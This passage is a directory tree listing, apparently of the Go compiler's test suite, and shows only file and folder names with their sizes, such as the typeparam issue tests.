│ │ │ ├── [4.3K] rob2.go
│ │ │ ├── [ 881] robfor.go
│ │ │ ├── [1.4K] robfunc.go
│ │ │ ├── [2.3K] shift.go
│ │ │ ├── [ 730] simparray.go
│ │ │ ├── [1.8K] simpbool.go
│ │ │ ├── [ 490] simpconv.go
│ │ │ ├── [ 380] simpfun.go
│ │ │ ├── [ 487] simpswitch.go
│ │ │ ├── [ 348] simpvar.go
│ │ │ ├── [2.7K] slicearray.go
│ │ │ ├── [2.7K] sliceslice.go
│ │ │ ├── [1.8K] string.go
│ │ │ ├── [ 49] string.out
│ │ │ └── [1.1K] strvar.go
│ │ ├── [2.1K] label1.go
│ │ ├── [1.0K] label.go
│ │ ├── [ 236] linkmain.go
│ │ ├── [1.7K] linkmain_run.go
│ │ ├── [ 597] linkname3.go
│ │ ├── [4.0K] linkname.dir
│ │ │ ├── [ 174] linkname1.go
│ │ │ ├── [ 310] linkname2.go
│ │ │ └── [ 270] linkname3.go
│ │ ├── [ 456] linkname.go
│ │ ├── [3.2K] linkobj.go
│ │ ├── [ 741] linkx.go
│ │ ├── [1.7K] linkx_run.go
│ │ ├── [2.2K] literal2.go
│ │ ├── [5.0K] literal.go
│ │ ├── [1.3K] live1.go
│ │ ├── [ 963] live2.go
│ │ ├── [ 18K] live.go
│ │ ├── [ 18K] live_regabi.go
│ │ ├── [1.1K] live_syscall.go
│ │ ├── [3.6K] locklinear.go
│ │ ├── [9.8K] loopbce.go
│ │ ├── [ 598] mainsig.go
│ │ ├── [1.0K] makechan.go
│ │ ├── [1.3K] makemap.go
│ │ ├── [ 605] makenew.go
│ │ ├── [5.5K] makeslice.go
│ │ ├── [1.2K] mallocfin.go
│ │ ├── [1.5K] map1.go
│ │ ├── [1.5K] mapclear.go
│ │ ├── [ 15K] map.go
│ │ ├── [3.6K] maplinear.go
│ │ ├── [1.1K] maymorestack.go
│ │ ├── [3.2K] mergemul.go
│ │ ├── [ 727] method1.go
│ │ ├── [1.2K] method2.go
│ │ ├── [ 570] method3.go
│ │ ├── [4.0K] method4.dir
│ │ │ ├── [ 557] method4a.go
│ │ │ └── [1.7K] prog.go
│ │ ├── [ 230] method4.go
│ │ ├── [6.7K] method5.go
│ │ ├── [ 467] method6.go
│ │ ├── [1.1K] method7.go
│ │ ├── [5.2K] method.go
│ │ ├── [ 984] named1.go
│ │ ├── [4.6K] named.go
│ │ ├── [3.6K] nilcheck.go
│ │ ├── [2.2K] nil.go
│ │ ├── [3.6K] nilptr2.go
│ │ ├── [5.4K] nilptr3.go
│ │ ├── [ 428] nilptr4.go
│ │ ├── [ 805] nilptr5_aix.go
│ │ ├── [ 814] nilptr5.go
│ │ ├── [ 812] nilptr5_wasm.go
│ │ ├── [3.1K] nilptr_aix.go
│ │ ├── [3.2K] nilptr.go
│ │ ├── [ 11K] nosplit.go
│ │ ├── [1.8K] notinheap2.go
│ │ ├── [1.2K] notinheap3.go
│ │ ├── [1.3K] notinheap.go
│ │ ├── [1.2K] nowritebarrier.go
│ │ ├── [1.2K] nul1.go
│ │ ├── [2.1K] opt_branchlikely.go
│ │ ├── [ 424] parentype.go
│ │ ├── [2.2K] peano.go
│ │ ├── [2.0K] phiopt.go
│ │ ├── [ 315] printbig.go
│ │ ├── [ 41] printbig.out
│ │ ├── [1.6K] print.go
│ │ ├── [ 247] print.out
│ │ ├── [ 20K] prove.go
│ │ ├── [8.1K] range.go
│ │ ├── [ 696] README.md
│ │ ├── [2.5K] recover1.go
│ │ ├── [1.2K] recover2.go
│ │ ├── [1.6K] recover3.go
│ │ ├── [2.2K] recover4.go
│ │ ├── [ 408] recover5.go
│ │ ├── [ 11K] recover.go
│ │ ├── [ 578] reflectmethod1.go
│ │ ├── [ 719] reflectmethod2.go
│ │ ├── [ 651] reflectmethod3.go
│ │ ├── [ 573] reflectmethod4.go
│ │ ├── [ 544] reflectmethod5.go
│ │ ├── [ 555] reflectmethod6.go
│ │ ├── [ 421] reflectmethod7.go
│ │ ├── [ 479] reflectmethod8.go
│ │ ├── [1.1K] rename1.go
│ │ ├── [1.5K] rename.go
│ │ ├── [7.2K] reorder2.go
│ │ ├── [2.3K] reorder.go
│ │ ├── [4.0K] retjmp.dir
│ │ │ ├── [ 385] a.s
│ │ │ └── [ 655] main.go
│ │ ├── [ 252] retjmp.go
│ │ ├── [ 33K] return.go
│ │ ├── [ 286] rotate0.go
│ │ ├── [ 286] rotate1.go
│ │ ├── [ 286] rotate2.go
│ │ ├── [ 286] rotate3.go
│ │ ├── [3.3K] rotate.go
│ │ ├── [ 603] rune.go
│ │ ├── [ 58K] run.go
│ │ ├── [4.0K] runtime
│ │ │ ├── [ 618] inlinegcpc.go
│ │ │ └── [ 343] README
│ │ ├── [ 600] runtime.go
│ │ ├── [9.4K] shift1.go
│ │ ├── [1.3K] shift2.go
│ │ ├── [ 834] shift3.go
│ │ ├── [1.0K] sieve.go
│ │ ├── [ 365] sigchld.go
│ │ ├── [ 17] sigchld.out
│ │ ├── [1.1K] simassign.go
│ │ ├── [5.8K] sinit.go
│ │ ├── [ 868] sinit_run.go
│ │ ├── [2.9K] sizeof.go
│ │ ├── [5.2K] slice3err.go
│ │ ├── [2.9K] slice3.go
│ │ ├── [1.9K] slicecap.go
│ │ ├── [ 735] sliceopt.go
│ │ ├── [2.9K] solitaire.go
│ │ ├── [1.7K] stack.go
│ │ ├── [1.6K] stackobj2.go
│ │ ├── [1.4K] stackobj3.go
│ │ ├── [ 975] stackobj.go
│ │ ├── [ 674] strcopy.go
│ │ ├── [1.0K] strength.go
│ │ ├── [4.0K] stress
│ │ │ ├── [1.8K] maps.go
│ │ │ ├── [4.1K] parsego.go
│ │ │ └── [3.6K] runstress.go
│ │ ├── [3.6K] string_lit.go
│ │ ├── [1.5K] stringrange.go
│ │ ├── [ 565] struct0.go
│ │ ├── [ 778] switch2.go
│ │ ├── [1.2K] switch3.go
│ │ ├── [ 526] switch4.go
│ │ ├── [2.2K] switch5.go
│ │ ├── [1.1K] switch6.go
│ │ ├── [ 796] switch7.go
│ │ ├── [6.1K] switch.go
│ │ ├── [4.0K] syntax
│ │ │ ├── [ 384] chan1.go
│ │ │ ├── [ 492] chan.go
│ │ │ ├── [ 304] composite.go
│ │ │ ├── [ 267] ddd.go
│ │ │ ├── [ 306] else.go
│ │ │ ├── [ 304] if.go
│ │ │ ├── [ 243] import.go
│ │ │ ├── [ 467] initvar.go
│ │ │ ├── [ 301] semi1.go
│ │ │ ├── [ 280] semi2.go
│ │ │ ├── [ 305] semi3.go
│ │ │ ├── [ 360] semi4.go
│ │ │ ├── [ 262] semi5.go
│ │ │ ├── [ 299] semi6.go
│ │ │ ├── [ 329] semi7.go
│ │ │ ├── [ 502] topexpr.go
│ │ │ ├── [ 318] typesw.go
│ │ │ ├── [ 361] vareq1.go
│ │ │ └── [ 313] vareq.go
│ │ ├── [1.6K] tinyfin.go
│ │ ├── [7.7K] torture.go
│ │ ├── [ 893] turing.go
│ │ ├── [ 543] typecheck.go
│ │ ├── [ 526] typecheckloop.go
│ │ ├── [ 12K] typeparam
│ │ │ ├── [3.6K] absdiff2.go
│ │ │ ├── [2.6K] absdiff3.go
│ │ │ ├── [2.9K] absdiff.go
│ │ │ ├── [4.0K] absdiffimp2.dir
│ │ │ │ ├── [2.8K] a.go
│ │ │ │ └── [ 879] main.go
│ │ │ ├── [ 187] absdiffimp2.go
│ │ │ ├── [4.0K] absdiffimp.dir
│ │ │ │ ├── [2.1K] a.go
│ │ │ │ └── [ 998] main.go
│ │ │ ├── [ 187] absdiffimp.go
│ │ │ ├── [ 559] adder.go
│ │ │ ├── [4.0K] aliasimp.dir
│ │ │ │ ├── [ 204] a.go
│ │ │ │ └── [ 709] main.go
│ │ │ ├── [ 187] aliasimp.go
│ │ │ ├── [ 597] append.go
│ │ │ ├── [2.7K] boundmethod.go
│ │ │ ├── [1.9K] builtins.go
│ │ │ ├── [8.4K] chans.go
│ │ │ ├── [4.0K] chansimp.dir
│ │ │ │ ├── [5.5K] a.go
│ │ │ │ └── [3.1K] main.go
│ │ │ ├── [ 187] chansimp.go
│ │ │ ├── [1.5K] combine.go
│ │ │ ├── [1.9K] cons.go
│ │ │ ├── [4.0K] dedup.dir
│ │ │ │ ├── [ 238] a.go
│ │ │ │ ├── [ 268] b.go
│ │ │ │ ├── [ 268] c.go
│ │ │ │ └── [ 230] main.go
│ │ │ ├── [ 437] dedup.go
│ │ │ ├── [ 20] dedup.out
│ │ │ ├── [3.3K] dictionaryCapture.go
│ │ │ ├── [1.8K] dictionaryCapture-noinline.go
│ │ │ ├── [1.4K] dottype.go
│ │ │ ├── [ 47] dottype.out
│ │ │ ├── [1.5K] double.go
│ │ │ ├── [1.1K] eface.go
│ │ │ ├── [1.3K] equal.go
│ │ │ ├── [ 618] fact.go
│ │ │ ├── [4.0K] factimp.dir
│ │ │ │ ├── [ 279] a.go
│ │ │ │ └── [ 516] main.go
│ │ │ ├── [ 187] factimp.go
│ │ │ ├── [4.0K] gencrawler.dir
│ │ │ │ ├── [ 412] a.go
│ │ │ │ └── [ 234] main.go
│ │ │ ├── [ 301] gencrawler.go
│ │ │ ├── [ 4] gencrawler.out
│ │ │ ├── [ 801] genembed2.go
│ │ │ ├── [ 901] genembed.go
│ │ │ ├── [4.0K] geninline.dir
│ │ │ │ ├── [ 799] a.go
│ │ │ │ └── [ 342] main.go
│ │ │ ├── [ 187] geninline.go
│ │ │ ├── [5.7K] graph.go
│ │ │ ├── [1.7K] ifaceconv.go
│ │ │ ├── [ 319] importtest.go
│ │ │ ├── [1.5K] index2.go
│ │ │ ├── [1.5K] index.go
│ │ │ ├── [ 692] interfacearg.go
│ │ │ ├── [ 556] issue23536.go
│ │ │ ├── [ 401] issue376214.go
│ │ │ ├── [ 593] issue39755.go
│ │ │ ├── [ 363] issue42758.go
│ │ │ ├── [1.9K] issue44688.go
│ │ │ ├── [ 471] issue45547.go
│ │ │ ├── [ 562] issue45722.go
│ │ │ ├── [ 290] issue45738.go
│ │ │ ├── [ 406] issue45817.go
│ │ │ ├── [4.0K] issue46461b.dir
│ │ │ │ ├── [ 206] a.go
│ │ │ │ └── [ 242] b.go
│ │ │ ├── [ 191] issue46461b.go
│ │ │ ├── [ 302] issue46461.go
│ │ │ ├── [ 339] issue46472.go
│ │ │ ├── [ 347] issue46591.go
│ │ │ ├── [ 686] issue47258.go
│ │ │ ├── [1.0K] issue47272.go
│ │ │ ├── [ 29] issue47272.out
│ │ │ ├── [ 336] issue47514b.go
│ │ │ ├── [4.0K] issue47514c.dir
│ │ │ │ ├── [ 50] a.go
│ │ │ │ └── [ 91] main.go
│ │ │ ├── [ 187] issue47514c.go
│ │ │ ├── [ 373] issue47514.go
│ │ │ ├── [ 832] issue47631.go
│ │ │ ├── [ 452] issue47676.go
│ │ │ ├── [ 395] issue47684b.go
│ │ │ ├── [ 317] issue47684c.go
│ │ │ ├── [ 299] issue47684.go
│ │ │ ├── [ 934] issue47708.go
│ │ │ ├── [ 398] issue47710.go
│ │ │ ├── [ 888] issue47713.go
│ │ │ ├── [ 10] issue47713.out
│ │ │ ├── [1.6K] issue47716.go
│ │ │ ├── [ 350] issue47723.go
│ │ │ ├── [ 358] issue47740b.go
│ │ │ ├── [1008] issue47740.go
│ │ │ ├── [ 0] issue47740.out
│ │ │ ├── [ 370] issue47775b.go
│ │ │ ├── [4.0K] issue47775.dir
│ │ │ │ ├── [ 298] b.go
│ │ │ │ └── [ 218] main.go
│ │ │ ├── [ 187] issue47775.go
│ │ │ ├── [ 338] issue47797.go
│ │ │ ├── [ 444] issue47877.go
│ │ │ ├── [ 802] issue47878.go
│ │ │ ├── [4.0K] issue47892b.dir
│ │ │ │ ├── [ 436] a.go
│ │ │ │ └── [ 279] main.go
│ │ │ ├── [ 191] issue47892b.go
│ │ │ ├── [4.0K] issue47892.dir
│ │ │ │ ├── [ 281] a.go
│ │ │ │ └── [ 380] main.go
│ │ │ ├── [ 186] issue47892.go
│ │ │ ├── [1.4K] issue47896.go
│ │ │ ├── [ 372] issue47901.go
│ │ │ ├── [ 296] issue47924.go
│ │ │ ├── [ 486] issue47925b.go
│ │ │ ├── [ 520] issue47925c.go
│ │ │ ├── [ 687] issue47925d.go
│ │ │ ├── [ 363] issue47925.go
│ │ │ ├── [ 530] issue47929.go
│ │ │ ├── [ 272] issue47948.go
│ │ │ ├── [ 201] issue47966.go
│ │ │ ├── [ 616] issue48013.go
│ │ │ ├── [ 574] issue48016.go
│ │ │ ├── [ 481] issue48030.go
│ │ │ ├── [1.3K] issue48042.go
│ │ │ ├── [ 427] issue48047.go
│ │ │ ├── [ 493] issue48049.go
│ │ │ ├── [ 398] issue48056.go
│ │ │ ├── [4.0K] issue48094b.dir
│ │ │ │ ├── [ 211] a.go
│ │ │ │ └── [ 204] b.go
│ │ │ ├── [ 191] issue48094b.go
│ │ │ ├── [4.0K] issue48094.dir
│ │ │ │ ├── [ 429] a.go
│ │ │ │ └── [ 373] main.go
│ │ │ ├── [ 187] issue48094.go
│ │ │ ├── [ 365] issue48137.go
│ │ │ ├── [4.0K] issue48185a.dir
│ │ │ │ ├── [ 444] p.go
│ │ │ │ └── [ 277] p_test.go
│ │ │ ├── [ 187] issue48185a.go
│ │ │ ├── [4.0K] issue48185b.dir
│ │ │ │ ├── [1.0K] a.go
│ │ │ │ └── [ 395] main.go
│ │ │ ├── [ 187] issue48185b.go
│ │ │ ├── [9.7K] issue48191.go
│ │ │ ├── [ 372] issue48198.go
│ │ │ ├── [ 610] issue48225.go
│ │ │ ├── [ 551] issue48253.go
│ │ │ ├── [ 337] issue48276a.go
│ │ │ ├── [ 4] issue48276a.out
│ │ │ ├── [ 266] issue48276b.go
│ │ │ ├── [4.0K] issue48280.dir
│ │ │ │ ├── [ 223] a.go
│ │ │ │ └── [ 215] main.go
│ │ │ ├── [ 187] issue48280.go
│ │ │ ├── [4.0K] issue48306.dir
│ │ │ │ ├── [ 206] a.go
│ │ │ │ └── [ 276] main.go
│ │ │ ├── [ 187] issue48306.go
│ │ │ ├── [ 648] issue48317.go
│ │ │ ├── [ 581] issue48318.go
│ │ │ ├── [4.0K] issue48337a.dir
│ │ │ │ ├── [ 551] a.go
│ │ │ │ └── [ 284] main.go
│ │ │ ├── [ 187] issue48337a.go
│ │ │ ├── [ 27] issue48337a.out
│ │ │ ├── [4.0K] issue48337b.dir
│ │ │ │ ├── [ 508] a.go
│ │ │ │ └── [ 226] main.go
│ │ │ ├── [ 187] issue48337b.go
│ │ │ ├── [ 360] issue48344.go
│ │ │ ├── [ 916] issue48424.go
│ │ │ ├── [ 393] issue48453.go
│ │ │ ├── [4.0K] issue48454.dir
│ │ │ │ ├── [ 280] a.go
│ │ │ │ ├── [ 237] b.go
│ │ │ │ └── [ 221] main.go
│ │ │ ├── [ 187] issue48454.go
│ │ │ ├── [4.0K] issue48462.dir
│ │ │ │ ├── [ 383] a.go
│ │ │ │ └── [ 397] main.go
│ │ │ ├── [ 187] issue48462.go
│ │ │ ├── [ 295] issue48537.go
│ │ │ ├── [ 790] issue48538.go
│ │ │ ├── [ 475] issue48598.go
│ │ │ ├── [ 414] issue48602.go
│ │ │ ├── [ 396] issue48604.go
│ │ │ ├── [ 291] issue48609.go
│ │ │ ├── [ 446] issue48617.go
│ │ │ ├── [ 510] issue48645a.go
│ │ │ ├── [ 21] issue48645a.out
│ │ │ ├── [1.4K] issue48645b.go
│ │ │ ├── [ 342] issue48711.go
│ │ │ ├── [4.0K] issue48716.dir
│ │ │ │ ├── [ 861] a.go
│ │ │ │ └── [1021] main.go
│ │ │ ├── [ 187] issue48716.go
│ │ │ ├── [ 467] issue48838.go
│ │ │ ├── [4.0K] issue48962.dir
│ │ │ │ ├── [ 307] a.go
│ │ │ │ └── [1.4K] b.go
│ │ │ ├── [ 194] issue48962.go
│ │ │ ├── [4.0K] issue49027.dir
│ │ │ │ ├── [ 871] a.go
│ │ │ │ └── [ 617] main.go
│ │ │ ├── [ 187] issue49027.go
│ │ │ ├── [ 354] issue49049.go
│ │ │ ├── [4.0K] issue49241.dir
│ │ │ │ ├── [ 229] a.go
│ │ │ │ ├── [ 312] b.go
│ │ │ │ ├── [ 312] c.go
│ │ │ │ └── [ 342] main.go
│ │ │ ├── [ 187] issue49241.go
│ │ │ ├── [4.0K] issue49246.dir
│ │ │ │ ├── [ 429] a.go
│ │ │ │ └── [ 213] b.go
│ │ │ ├── [ 191] issue49246.go
│ │ │ ├── [ 542] issue49295.go
│ │ │ ├── [ 351] issue49309.go
│ │ │ ├── [ 392] issue49421.go
│ │ │ ├── [ 387] issue49432.go
│ │ │ ├── [4.0K] issue49497.dir
│ │ │ │ ├── [ 365] a.go
│ │ │ │ └── [ 219] main.go
│ │ │ ├── [ 187] issue49497.go
│ │ │ ├── [ 423] issue49516.go
│ │ │ ├── [4.0K] issue49524.dir
│ │ │ │ ├── [ 191] a.go
│ │ │ │ └── [ 216] main.go
│ │ │ ├── [ 187] issue49524.go
│ │ │ ├── [4.0K] issue49536.dir
│ │ │ │ ├── [ 317] a.go
│ │ │ │ └── [ 199] b.go
│ │ │ ├── [ 191] issue49536.go
│ │ │ ├── [ 337] issue49538.go
│ │ │ ├── [ 384] issue49547.go
│ │ │ ├── [ 211] issue49611.go
│ │ │ ├── [ 492] issue49659b.go
│ │ │ ├── [4.0K] issue49659.dir
│ │ │ │ ├── [ 236] a.go
│ │ │ │ └── [ 252] b.go
│ │ │ ├── [ 191] issue49659.go
│ │ │ ├── [4.0K] issue49667.dir
│ │ │ │ ├── [ 226] a.go
│ │ │ │ ├── [ 220] b.go
│ │ │ │ └── [ 220] main.go
│ │ │ ├── [ 187] issue49667.go
│ │ │ ├── [ 256] issue49875.go
│ │ │ ├── [4.0K] issue49893.dir
│ │ │ │ ├── [ 306] a.go
│ │ │ │ ├── [ 280] b.go
│ │ │ │ └── [ 266] main.go
│ │ │ ├── [ 191] issue49893.go
│ │ │ ├── [1.3K] issue50002.go
│ │ │ ├── [ 390] issue50109b.go
│ │ │ ├── [2.2K] issue50109.go
│ │ │ ├── [ 13] issue50109.out
│ │ │ ├── [4.0K] issue50121b.dir
│ │ │ │ ├── [ 379] a.go
│ │ │ │ ├── [ 224] b.go
│ │ │ │ ├── [ 241] c.go
│ │ │ │ ├── [ 235] d.go
│ │ │ │ └── [ 159] main.go
│ │ │ ├── [ 187] issue50121b.go
│ │ │ ├── [4.0K] issue50121.dir
│ │ │ │ ├── [ 495] a.go
│ │ │ │ └── [ 281] main.go
│ │ │ ├── [ 187] issue50121.go
│ │ │ ├── [ 241] issue50147.go
│ │ │ ├── [2.0K] issue50177.go
│ │ │ ├── [ 599] issue50193.go
│ │ │ ├── [ 48] issue50193.out
│ │ │ ├── [ 244] issue50259.go
│ │ │ ├── [ 822] issue50264.go
│ │ │ ├── [ 354] issue50317.go
│ │ │ ├── [ 921] issue50417b.go
│ │ │ ├── [1.5K] issue50417.go
│ │ │ ├── [ 689] issue50419.go
│ │ │ ├── [4.0K] issue50437.dir
│ │ │ │ ├── [ 935] a.go
│ │ │ │ └── [ 224] b.go
│ │ │ ├── [ 191] issue50437.go
│ │ │ ├── [4.0K] issue50481b.dir
│ │ │ │ ├── [ 338] b.go
│ │ │ │ └── [ 559] main.go
│ │ │ ├── [ 187] issue50481b.go
│ │ │ ├── [4.0K] issue50481c.dir
│ │ │ │ ├── [ 419] a.go
│ │ │ │ └── [ 408] main.go
│ │ │ ├── [ 187] issue50481c.go
│ │ │ ├── [ 2] issue50481c.out
│ │ │ ├── [4.0K] issue50485.dir
│ │ │ │ ├── [4.4K] a.go
│ │ │ │ └── [ 82] main.go
│ │ │ ├── [ 191] issue50485.go
│ │ │ ├── [4.0K] issue50486.dir
│ │ │ │ ├── [1.2K] goerror_fp.go
│ │ │ │ └── [ 248] main.go
│ │ │ ├── [ 191] issue50486.go
│ │ │ ├── [4.0K] issue50552.dir
│ │ │ │ ├── [ 196] a.go
│ │ │ │ └── [ 362] main.go
│ │ │ ├── [ 191] issue50552.go
│ │ │ ├── [4.0K] issue50561.dir
│ │ │ │ ├── [1.8K] diameter.go
│ │ │ │ └── [ 268] main.go
│ │ │ ├── [ 191] issue50561.go
│ │ │ ├── [4.0K] issue50598.dir
│ │ │ │ ├── [ 398] a0.go
│ │ │ │ ├── [ 236] a1.go
│ │ │ │ ├── [ 239] a2.go
│ │ │ │ └── [ 369] main.go
│ │ │ ├── [ 187] issue50598.go
│ │ │ ├── [1013] issue50642.go
│ │ │ ├── [1.6K] issue50690a.go
│ │ │ ├── [ 20] issue50690a.out
│ │ │ ├── [ 916] issue50690b.go
│ │ │ ├── [ 14] issue50690b.out
│ │ │ ├── [ 917] issue50690c.go
│ │ │ ├── [ 14] issue50690c.out
│ │ │ ├── [ 415] issue50833.go
│ │ │ ├── [4.0K] issue50841.dir
│ │ │ │ ├── [ 418] a.go
│ │ │ │ └── [ 216] b.go
│ │ │ ├── [ 191] issue50841.go
│ │ │ ├── [ 569] issue50993.go
│ │ │ ├── [4.0K] issue51219b.dir
│ │ │ │ ├── [ 792] a.go
│ │ │ │ ├── [ 331] b.go
│ │ │ │ └── [ 318] p.go
│ │ │ ├── [ 191] issue51219b.go
│ │ │ ├── [4.0K] issue51219.dir
│ │ │ │ ├── [ 487] a.go
│ │ │ │ └── [ 262] main.go
│ │ │ ├── [ 187] issue51219.go
│ │ │ ├── [ 3] issue51219.out
│ │ │ ├── [ 702] issue51232.go
│ │ │ ├── [ 663] issue51233.go
│ │ │ ├── [ 298] issue51236.go
│ │ │ ├── [ 267] issue51245.go
│ │ │ ├── [4.0K] issue51250a.dir
│ │ │ │ ├── [ 201] a.go
│ │ │ │ ├── [ 397] b.go
│ │ │ │ └── [ 355] main.go
│ │ │ ├── [ 187] issue51250a.go
│ │ │ ├── [1.1K] issue51303.go
│ │ │ ├── [ 40] issue51303.out
│ │ │ ├── [ 498] issue51355.go
│ │ │ ├── [4.0K] issue51367.dir
│ │ │ │ ├── [ 281] a.go
│ │ │ │ └── [ 232] main.go
│ │ │ ├── [ 187] issue51367.go
│ │ │ ├── [4.0K] issue51423.dir
│ │ │ │ ├── [ 318] a.go
│ │ │ │ └── [ 114] b.go
│ │ │ ├── [ 191] issue51423.go
│ │ │ ├── [ 546] issue51521.go
│ │ │ ├── [ 543] issue51522a.go
│ │ │ ├── [ 730] issue51522b.go
│ │ │ ├── [ 413] issue51700.go
│ │ │ ├── [ 585] issue51733.go
│ │ │ ├── [ 308] issue51765.go
│ │ │ ├── [4.0K] issue51836.dir
│ │ │ │ ├── [ 225] aa.go
│ │ │ │ ├── [ 196] a.go
│ │ │ │ └── [ 210] p.go
│ │ │ ├── [ 194] issue51836.go
│ │ │ ├── [ 257] issue52124.go
│ │ │ ├── [ 476] issue52228.go
│ │ │ ├── [ 15K] list2.go
│ │ │ ├── [2.4K] list.go
│ │ │ ├── [4.0K] listimp2.dir
│ │ │ │ ├── [8.0K] a.go
│ │ │ │ └── [7.4K] main.go
│ │ │ ├── [ 187] listimp2.go
│ │ │ ├── [4.0K] listimp.dir
│ │ │ │ ├── [1.1K] a.go
│ │ │ │ └── [1.4K] main.go
│ │ │ ├── [ 187] listimp.go
│ │ │ ├── [ 916] lockable.go
│ │ │ ├── [ 885] map.go
│ │ │ ├── [4.0K] mapimp.dir
│ │ │ │ ├── [ 397] a.go
│ │ │ │ └── [ 661] main.go
│ │ │ ├── [ 187] mapimp.go
│ │ │ ├── [5.9K] maps.go
│ │ │ ├── [4.0K] mapsimp.dir
│ │ │ │ ├── [2.5K] a.go
│ │ │ │ └── [3.6K] main.go
│ │ │ ├── [ 187] mapsimp.go
│ │ │ ├── [4.0K] mdempsky
│ │ │ │ ├── [4.0K] 10.dir
│ │ │ │ │ ├── [ 204] a.go
│ │ │ │ │ └── [ 264] b.go
│ │ │ │ ├── [ 187] 10.go
│ │ │ │ ├── [ 306] 11.go
│ │ │ │ ├── [4.0K] 12.dir
│ │ │ │ │ ├── [ 219] a.go
│ │ │ │ │ └── [ 218] main.go
│ │ │ │ ├── [ 218] 12.go
│ │ │ │ ├── [1.4K] 13.go
│ │ │ │ ├── [ 568] 14.go
│ │ │ │ ├── [1.2K] 15.go
│ │ │ │ ├── [4.0K] 1.dir
│ │ │ │ │ ├── [ 219] a.go
│ │ │ │ │ └── [ 210] b.go
│ │ │ │ ├── [ 191] 1.go
│ │ │ │ ├── [ 339] 2.go
│ │ │ │ ├── [4.0K] 3.dir
│ │ │ │ │ ├── [ 211] a.go
│ │ │ │ │ └── [ 218] b.go
│ │ │ │ ├── [ 191] 3.go
│ │ │ │ ├── [4.0K] 4.dir
│ │ │ │ │ ├── [ 221] a.go
│ │ │ │ │ └── [ 205] b.go
│ │ │ │ ├── [ 191] 4.go
│ │ │ │ ├── [ 260] 5.go
│ │ │ │ ├── [ 234] 6.go
│ │ │ │ ├── [4.0K] 7.dir
│ │ │ │ │ ├── [ 218] a.go
│ │ │ │ │ └── [ 197] b.go
│ │ │ │ ├── [ 191] 7.go
│ │ │ │ ├── [4.0K] 8.dir
│ │ │ │ │ ├── [ 210] a.go
│ │ │ │ │ └── [ 257] b.go
│ │ │ │ ├── [ 194] 8.go
│ │ │ │ └── [ 253] 9.go
│ │ │ ├── [4.4K] metrics.go
│ │ │ ├── [4.0K] mincheck.dir
│ │ │ │ ├── [ 292] a.go
│ │ │ │ └── [ 929] main.go
│ │ │ ├── [ 194] mincheck.go
│ │ │ ├── [ 979] min.go
│ │ │ ├── [4.0K] minimp.dir
│ │ │ │ ├── [ 305] a.go
│ │ │ │ └── [ 855] main.go
│ │ │ ├── [ 187] minimp.go
│ │ │ ├── [4.0K] mutualimp.dir
│ │ │ │ ├── [ 337] a.go
│ │ │ │ └── [ 222] b.go
│ │ │ ├── [ 191] mutualimp.go
│ │ │ ├── [3.0K] nested.go
│ │ │ ├── [ 155] nested.out
│ │ │ ├── [2.2K] ordered.go
│ │ │ ├── [7.1K] orderedmap.go
│ │ │ ├── [4.0K] orderedmapsimp.dir
│ │ │ │ ├── [5.5K] a.go
│ │ │ │ └── [1.5K] main.go
│ │ │ ├── [ 187] orderedmapsimp.go
│ │ │ ├── [ 739] pair.go
│ │ │ ├── [4.0K] pairimp.dir
│ │ │ │ ├── [ 226] a.go
│ │ │ │ └── [ 716] main.go
│ │ │ ├── [ 187] pairimp.go
│ │ │ ├── [ 411] pragma.go
│ │ │ ├── [4.0K] recoverimp.dir
│ │ │ │ ├── [ 307] a.go
│ │ │ │ └── [ 228] main.go
│ │ │ ├── [ 187] recoverimp.go
│ │ │ ├── [ 24] recoverimp.out
│ │ │ ├── [4.0K] select.dir
│ │ │ │ ├── [ 274] a.go
│ │ │ │ └── [ 408] main.go
│ │ │ ├── [ 187] select.go
│ │ │ ├── [5.7K] sets.go
│ │ │ ├── [4.0K] setsimp.dir
│ │ │ │ ├── [2.7K] a.go
│ │ │ │ └── [3.2K] main.go
│ │ │ ├── [ 187] setsimp.go
│ │ │ ├── [2.7K] settable.go
│ │ │ ├── [ 855] shape1.go
│ │ │ ├── [ 10] shape1.out
│ │ │ ├── [4.0K] sliceimp.dir
│ │ │ │ ├── [3.3K] a.go
│ │ │ │ └── [4.6K] main.go
│ │ │ ├── [ 187] sliceimp.go
│ │ │ ├── [7.8K] slices.go
│ │ │ ├── [ 825] smallest.go
│ │ │ ├── [1019] smoketest.go
│ │ │ ├── [ 833] stringable.go
│ │ │ ├── [1.6K] stringer.go
│ │ │ ├── [4.0K] stringerimp.dir
│ │ │ │ ├── [ 340] a.go
│ │ │ │ └── [ 741] main.go
│ │ │ ├── [ 187] stringerimp.go
│ │ │ ├── [ 783] struct.go
│ │ │ ├── [4.0K] structinit.dir
│ │ │ │ ├── [ 281] a.go
│ │ │ │ ├── [ 221] b.go
│ │ │ │ └── [ 211] main.go
│ │ │ ├── [ 187] structinit.go
│ │ │ ├── [ 842] subdict.go
│ │ │ ├── [ 923] sum.go
│ │ │ ├── [1.1K] tparam1.go
│ │ │ ├── [3.2K] typelist.go
│ │ │ ├── [ 648] typeswitch1.go
│ │ │ ├── [ 56] typeswitch1.out
│ │ │ ├── [ 709] typeswitch2.go
│ │ │ ├── [ 78] typeswitch2.out
│ │ │ ├── [ 837] typeswitch3.go
│ │ │ ├── [ 59] typeswitch3.out
│ │ │ ├── [ 813] typeswitch4.go
│ │ │ ├── [ 101] typeswitch4.out
│ │ │ ├── [ 559] typeswitch5.go
│ │ │ ├── [ 41] typeswitch5.out
│ │ │ ├── [ 495] typeswitch6.go
│ │ │ ├── [ 20] typeswitch6.out
│ │ │ ├── [ 581] typeswitch7.go
│ │ │ ├── [ 19] typeswitch7.out
│ │ │ ├── [4.0K] valimp.dir
│ │ │ │ ├── [ 587] a.go
│ │ │ │ └── [1.2K] main.go
│ │ │ ├── [ 187] valimp.go
│ │ │ └── [1.5K] value.go
│ │ ├── [1.6K] typeswitch1.go
│ │ ├── [ 598] typeswitch2b.go
│ │ ├── [ 655] typeswitch2.go
│ │ ├── [ 999] typeswitch3.go
│ │ ├── [1.8K] typeswitch.go
│ │ ├── [2.2K] uintptrescapes2.go
│ │ ├── [1.3K] uintptrescapes3.go
│ │ ├── [4.0K] uintptrescapes.dir
│ │ │ ├── [ 879] a.go
│ │ │ └── [1.3K] main.go
│ │ ├── [ 250] uintptrescapes.go
│ │ ├── [ 758] undef.go
│ │ ├── [1.5K] unsafebuiltins.go
│ │ ├── [6.0K] used.go
│ │ ├── [1.2K] utf.go
│ │ ├── [ 449] varerr.go
│ │ ├── [ 509] varinit.go
│ │ ├── [2.0K] winbatch.go
│ │ ├── [5.9K] writebarrier.go
│ │ └── [5.7K] zerodivide.go
│ └── [ 20] VERSION
├── [4.0K] go-server-test
